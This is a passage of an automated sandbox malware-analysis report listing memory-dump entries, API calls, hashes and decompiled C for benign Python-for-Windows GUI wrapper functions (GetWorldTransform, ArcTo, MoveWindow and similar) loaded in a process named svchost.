                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OiOO:ImageList_Replace
                            • API String ID: 1248562531-806732491
                            • Opcode ID: 04d6ba1401edb94b502e98afea9f369e41ff69237a4634780be1285e622881c9
                            • Instruction ID: f9f7ff5573d00dafc6cde4de6f155f1130e990bdd07cf986304074fa5ee86d07
                            • Opcode Fuzzy Hash: 04d6ba1401edb94b502e98afea9f369e41ff69237a4634780be1285e622881c9
                            • Instruction Fuzzy Hash: 3C117F7540C306AFDB00DF54CC44BAB7BF9AF84215F448A29F894C2120E731D95A9BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOO:ImageList_Add,00000000,?), ref: 6DAAF132
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF153
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF165
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF177
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OOO:ImageList_Add
                            • API String ID: 1248562531-1709006905
                            • Opcode ID: a801733eb6f826de605fb7b5c02d07e36bd963311d48314564b2ee615b632629
                            • Instruction ID: b0cd972b1f9edf20a184ecc2448f1ca3e9f9cc798381c4243ce2d1ff40b5b471
                            • Opcode Fuzzy Hash: a801733eb6f826de605fb7b5c02d07e36bd963311d48314564b2ee615b632629
                            • Instruction Fuzzy Hash: 66115E7540C306AFDB00EF24CD44BABBBF9BF85245F484929F984C2121E731D95A8BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOi:InvalidateRgn,00000000,?), ref: 6DAB60DA
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB60FB
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB610D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: InvalidateRgn$OOi:InvalidateRgn
                            • API String ID: 1248562531-3879687307
                            • Opcode ID: aefc6ea852a811e9ca986e6b4c4025831e7347e2e5f8589eb6745367be1ac546
                            • Instruction ID: 728e68aabca6dfe44bbbbc24247330f3bf7e295af1a4e56f0ec67d17c5417fd1
                            • Opcode Fuzzy Hash: aefc6ea852a811e9ca986e6b4c4025831e7347e2e5f8589eb6745367be1ac546
                            • Instruction Fuzzy Hash: AC119375808302AFDB009F18DC41BAB7BB9BF44251F488569FC8582231E335D56A9AA7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyErr_Format.PYTHON38(6E2925BC,%s is not available on this platform,AngleArc), ref: 6DAAA51D
                            • PyArg_ParseTuple.PYTHON38(?,Oiikff:AngleArc,?,?,?,?,?,?), ref: 6DAAA551
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_FormatParseTuple
                            • String ID: %s is not available on this platform$AngleArc$AngleArc$Oiikff:AngleArc
                            • API String ID: 361908667-3156187010
                            • Opcode ID: db81c88ac2a5f5cf76866289b60d7aa63953bb943dcc2de4c70bfce0dc5895f0
                            • Instruction ID: 001dac141d17b5a2ef7fc78370f8683fbafdf742882b593d62775ea5ad1200a2
                            • Opcode Fuzzy Hash: db81c88ac2a5f5cf76866289b60d7aa63953bb943dcc2de4c70bfce0dc5895f0
                            • Instruction Fuzzy Hash: AE21637580C302AFCB01DF59CD80E6A77F9BF85200F488659F94592131E731DA6A9B63
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:SetMenu,?), ref: 6DAAE5F5
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAE616
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAE628
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OO:SetMenu$SetMenu
                            • API String ID: 1248562531-1696462938
                            • Opcode ID: 681ba75e481a1fb2c80fb8c9b9e7fc15cda688ee3e33c7dc1e82aff9ee048a96
                            • Instruction ID: 4b88b726e6f3e3dcb7d0052233532488fea1acfac7653625dcde89974cb0bfd4
                            • Opcode Fuzzy Hash: 681ba75e481a1fb2c80fb8c9b9e7fc15cda688ee3e33c7dc1e82aff9ee048a96
                            • Instruction Fuzzy Hash: 7111A77590C211AFEB00AF18CC45B7B77F8FF40315F888965FC54C2121F33199269A92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:PaintRgn,?), ref: 6DAB4D65
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB4D86
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB4D98
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OO:PaintRgn$PaintRgn
                            • API String ID: 1248562531-1047367956
                            • Opcode ID: 1c2a105ab7db658861e9790fed10eb710ef7a672c2010844896d514658483a43
                            • Instruction ID: a38f8305e3a7d3c17e02a1ec641aac7706286ec03513d0f9319bb278246cf607
                            • Opcode Fuzzy Hash: 1c2a105ab7db658861e9790fed10eb710ef7a672c2010844896d514658483a43
                            • Instruction Fuzzy Hash: 0511A73680C311AFDB00DB28CC45B7A77F8FF45215F888955FC5482121F37199279A92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,?), ref: 6DAA6D26
                            • PyErr_SetString.PYTHON38(6E28ED94,The value is not a valid null-terminated string), ref: 6DAA6D46
                            • IsBadReadPtr.KERNEL32(00000000,?), ref: 6DAA6D60
                            • ?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_WH@Z.PYWINTYPES38(?,?), ref: 6DAA6D79
                            • IsBadStringPtrW.KERNEL32 ref: 6DAA6D89
                            • ?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_W@Z.PYWINTYPES38 ref: 6DAA6D9D
                            Strings
                            • The value is not a valid address for reading, xrefs: 6DAA6D6A
                            • The value is not a valid null-terminated string, xrefs: 6DAA6D93
                            • PyGetString: NULL is not valid pointer, xrefs: 6DAA6D3A
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: FromObject_StringU_object@@$Arg_Err_ParseReadTuple
                            • String ID: PyGetString: NULL is not valid pointer$The value is not a valid address for reading$The value is not a valid null-terminated string
                            • API String ID: 554723670-4174888862
                            • Opcode ID: 2c5400517a2ce0e739d9f905900b7fddc74697c97ab94ad88bb4d19f2e3330a7
                            • Instruction ID: 64946703eeadd4a8b07cba6ec2769fbecaf32491599fab26f6d211b19b0b3feb
                            • Opcode Fuzzy Hash: 2c5400517a2ce0e739d9f905900b7fddc74697c97ab94ad88bb4d19f2e3330a7
                            • Instruction Fuzzy Hash: 5E11827540CB01AFDF006B28DD48A2A37B9BF41751F4C8728F465D22B0E731C9A6DA53
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetOpenFileName), ref: 6DAB2D55
                            • PyErr_Format.PYTHON38(6E28ED8C,Argument must be a %d-byte string (got string of %d bytes),00000058,?), ref: 6DAB2D98
                            Strings
                            • O:GetOpenFileName, xrefs: 6DAB2D4C
                            • Argument must be a %d-byte string (got type %s), xrefs: 6DAB2D7A
                            • Argument must be a %d-byte string (got string of %d bytes), xrefs: 6DAB2D8C
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_FormatParseTuple
                            • String ID: Argument must be a %d-byte string (got string of %d bytes)$Argument must be a %d-byte string (got type %s)$O:GetOpenFileName
                            • API String ID: 361908667-770682294
                            • Opcode ID: 7ab5560a388eff3e13104c9da5976e77156012e202b8f11c2469aa833046183e
                            • Instruction ID: b2cfdb9ebe9725c2e5a006345878f022ccd1c6abfc9a07fe6722acea1081636a
                            • Opcode Fuzzy Hash: 7ab5560a388eff3e13104c9da5976e77156012e202b8f11c2469aa833046183e
                            • Instruction Fuzzy Hash: FA01D232509200AFCF205F58CC48F6677B9FF42312F04856AF942D2162D73098979B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 16%
                            			E6DAA99B0(intOrPtr _a8) {
                            				struct _XFORM _v24;
                            				struct HDC__* _v28;
                            				char _v32;
                            				void* _t7;
                            				struct HDC__** _t8;
                            				int _t11;
                            				intOrPtr* _t14;
                            
                            				if( *0x6dac7c94 != 0) {
                            					_t7 =  &_v32;
                            					__imp__PyArg_ParseTuple(_a8, "O:GetWorldTransform", _t7);
                            					if(_t7 != 0) {
                            						_t8 =  &_v28;
                            						__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v32, _t8);
                            						if(_t8 == 0) {
                            							goto L3;
                            						} else {
                            							_t11 = GetWorldTransform(_v28,  &_v24);
                            							if(_t11 != 0) {
                            								return E6DAA9920( &_v32);
                            							} else {
                            								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("GetWorldTransform", _t11);
                            								return _t11;
                            							}
                            						}
                            					} else {
                            						L3:
                            						return 0;
                            					}
                            				} else {
                            					_t14 = __imp__PyExc_NotImplementedError;
                            					__imp__PyErr_Format( *_t14, "%s is not available on this platform", "GetWorldTransform");
                            					return _t14;
                            				}
                            			}











                            APIs
                            • PyErr_Format.PYTHON38(6E2925BC,%s is not available on this platform,GetWorldTransform), ref: 6DAA99CD
                            • PyArg_ParseTuple.PYTHON38(?,O:GetWorldTransform), ref: 6DAA99E7
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_FormatParseTuple
                            • String ID: %s is not available on this platform$GetWorldTransform$GetWorldTransform$O:GetWorldTransform
                            • API String ID: 361908667-1009900836
                            • Opcode ID: 2457bad8c7619bdab1ad003c450e88eb97dd06d1893b13fb67f5b8e29a4516dd
                            • Instruction ID: 675ab47a36d1863c29e4367c503ce287be4d15d7d6dd93f3ecbe115fc404b7e5
                            • Opcode Fuzzy Hash: 2457bad8c7619bdab1ad003c450e88eb97dd06d1893b13fb67f5b8e29a4516dd
                            • Instruction Fuzzy Hash: AF0175B580C201BFEF105B55CD85AB67BB8BB85204F8C4624F859C1132F736D6AAC752
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOOO:MsgWaitForMultipleObjectsEx,?,?,?,?,?), ref: 6DA918CF
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA918F4
                            • PyErr_Occurred.PYTHON38 ref: 6DA91906
                            Strings
                            • OOOO:MsgWaitForMultipleObjectsEx, xrefs: 6DA918C6
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskOccurredParseTupleUnsigned
                            • String ID: OOOO:MsgWaitForMultipleObjectsEx
                            • API String ID: 3166690688-2955484690
                            • Opcode ID: 3a856cfe8e80878f8484a5789caabe6eee1320886e8d9cd9eb38217bd3064f36
                            • Instruction ID: f5906d4627818495fe60bc96865b0e70b81e17e73a5db512ae6bc73d28f85ebc
                            • Opcode Fuzzy Hash: 3a856cfe8e80878f8484a5789caabe6eee1320886e8d9cd9eb38217bd3064f36
                            • Instruction Fuzzy Hash: 4821267951C3065BD700AE38DC40BABBBECEB81374F55463AEC64C2290E73AD55989A3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 16%
                            			E6DAA6DB0(intOrPtr _a8) {
                            				char _v4;
                            				wchar_t* _v8;
                            				void* _v12;
                            				int _v16;
                            				wchar_t** _t15;
                            				wchar_t** _t17;
                            				intOrPtr _t24;
                            				int _t26;
                            				intOrPtr* _t27;
                            				void* _t30;
                            
                            				_v12 = 0;
                            				_v16 = 0;
                            				_t15 =  &_v12;
                            				__imp__PyArg_ParseTuple(_a8,  *0x6dac79f4, _t15,  &_v4,  &_v16);
                            				if(_t15 == 0) {
                            					L3:
                            					return 0;
                            				} else {
                            					_t17 =  &_v8;
                            					__imp__?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z(_v4, _t17, 0, 0);
                            					if(_t17 != 0) {
                            						_t26 = _v16;
                            						if(_t26 == 0) {
                            							_t27 = _v8;
                            							_t30 = _t27 + 2;
                            							do {
                            								_t24 =  *_t27;
                            								_t27 = _t27 + 2;
                            							} while (_t24 != 0);
                            							_t26 = (_t27 - _t30 >> 1) + 1;
                            							_v16 = _t26;
                            						}
                            						if(IsBadWritePtr(_v12, _t26) == 0) {
                            							wcsncpy(_v12, _v8, _v16);
                            							 *__imp___Py_NoneStruct =  *__imp___Py_NoneStruct + 1;
                            							return __imp___Py_NoneStruct;
                            						} else {
                            							__imp__PyErr_SetString( *__imp__PyExc_ValueError, "The value is not a valid address for writing");
                            							return 0;
                            						}
                            					} else {
                            						__imp__PyErr_SetString( *__imp__PyExc_TypeError, "String must by string type");
                            						goto L3;
                            					}
                            				}
                            			}














                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,?,?), ref: 6DAA6DDB
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000000,00000000), ref: 6DAA6DF5
                            • PyErr_SetString.PYTHON38(6E28ED8C,String must by string type), ref: 6DAA6E0E
                            • IsBadWritePtr.KERNEL32(?), ref: 6DAA6E48
                            • PyErr_SetString.PYTHON38(6E28ED94,The value is not a valid address for writing), ref: 6DAA6E5E
                            • wcsncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6DAA6E78
                            Strings
                            • The value is not a valid address for writing, xrefs: 6DAA6E57
                            • String must by string type, xrefs: 6DAA6E07
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_String$Arg_Object_ParseTupleU_object@@Writewcsncpy
                            • String ID: String must by string type$The value is not a valid address for writing
                            • API String ID: 3068015728-1634853043
                            • Opcode ID: c585621ed5b1326dc40deb4b3efedb5a7311ee9e57cbac758971c74adde3cd73
                            • Instruction ID: 36f3a53a7bec576217ec76dfc156ace1d282b38a6d7348a6bc09da973bae2751
                            • Opcode Fuzzy Hash: c585621ed5b1326dc40deb4b3efedb5a7311ee9e57cbac758971c74adde3cd73
                            • Instruction Fuzzy Hash: E3213A7450C201AFDB009F28CC85B7A7BB5FF45305F488A58F99582232E7329966DF52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oiiiiiiii:Chord,?,?,?,?,?,?,?,?,?), ref: 6DAB41A0
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB41BC
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB41CB
                            • Chord.GDI32(?,?,?,?,?,?,?,?,?), ref: 6DAB41F7
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB4200
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(Chord,00000000), ref: 6DAB4216
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_ChordError@@Object_ParseRestoreSaveTupleWin_
                            • String ID: Chord$Oiiiiiiii:Chord
                            • API String ID: 158727516-2891005786
                            • Opcode ID: c18a164b58060aeff4697885c880cab8cdb096d4afc578f284027fcf7a415e99
                            • Instruction ID: dde38a8e31136968dcf41d4dcabc43d286320af8a21d3b0234739fde0f9073e6
                            • Opcode Fuzzy Hash: c18a164b58060aeff4697885c880cab8cdb096d4afc578f284027fcf7a415e99
                            • Instruction Fuzzy Hash: 97213072408204AFCB019F91DD84E5BBBFDFF88704F444A29F995D1120E731DA6A9B93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oiiiiiiii:ArcTo,?,?,?,?,?,?,?,?,?), ref: 6DAB40D0
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB40EC
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB40FB
                            • ArcTo.GDI32(?,?,?,?,?,?,?,?,?), ref: 6DAB4127
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB4130
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ArcTo,00000000), ref: 6DAB4146
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@Object_ParseRestoreSaveTupleWin_
                            • String ID: ArcTo$Oiiiiiiii:ArcTo
                            • API String ID: 2386446667-3779949223
                            • Opcode ID: 45c28a2d798ee254877a84f0302aacc2a43cc2e0b0d02c6932cb913744fb539b
                            • Instruction ID: b283a507b0dfe00f2b0069cb51260e488926a4f60338fd89de1495bf0535f227
                            • Opcode Fuzzy Hash: 45c28a2d798ee254877a84f0302aacc2a43cc2e0b0d02c6932cb913744fb539b
                            • Instruction Fuzzy Hash: 25215372408200AFCB019F51CD40E9BB7FDFF88304F044A19FA85D1120E731D9269B53
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oiiiii:MoveWindow,?,?,?,?,?,?), ref: 6DAB1D11
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB1D2D
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB1D3C
                            • MoveWindow.USER32(?,?,?,?,?,?), ref: 6DAB1D5C
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB1D65
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(MoveWindow,00000000), ref: 6DAB1D7B
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@MoveObject_ParseRestoreSaveTupleWin_Window
                            • String ID: MoveWindow$Oiiiii:MoveWindow
                            • API String ID: 1874448083-2698088070
                            • Opcode ID: ffee345ae7ad645c40098a0f574c3834711672c24819f6389d940cdfa7a62ee4
                            • Instruction ID: 9822a84088e2dd0299058a1bfec63c2d4de2a2c862a39004c53f0323f8e5abf7
                            • Opcode Fuzzy Hash: ffee345ae7ad645c40098a0f574c3834711672c24819f6389d940cdfa7a62ee4
                            • Instruction Fuzzy Hash: DC11827240C205AFCB019F55CD44BABBBF9FF84701F444A29F985D1121E731DA2A9BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO:ImageList_ReplaceIcon,00000000,?), ref: 6DAAF9BA
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF9DB
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF9ED
                            Strings
                            • OiO:ImageList_ReplaceIcon, xrefs: 6DAAF9B1
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OiO:ImageList_ReplaceIcon
                            • API String ID: 1248562531-2107667488
                            • Opcode ID: 52aba8bfeee4fe124ae9c2bba7d338c75e103a6bf29ab6b3019c0cee5d3150aa
                            • Instruction ID: 2b9f24b917b118d474baf2f69802fd88772c00064caeb7c0e33b48d62c217be5
                            • Opcode Fuzzy Hash: 52aba8bfeee4fe124ae9c2bba7d338c75e103a6bf29ab6b3019c0cee5d3150aa
                            • Instruction Fuzzy Hash: 86118276408301AFDB019B29DC44AAB7BF9FF84245F448A29F885C2131F731D95A8BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oi|i:GetScrollInfo,?,?), ref: 6DAAB601
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAB617
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAB635
                            • GetScrollInfo.USER32 ref: 6DAAB64A
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAB653
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetScrollInfo,00000000), ref: 6DAAB669
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
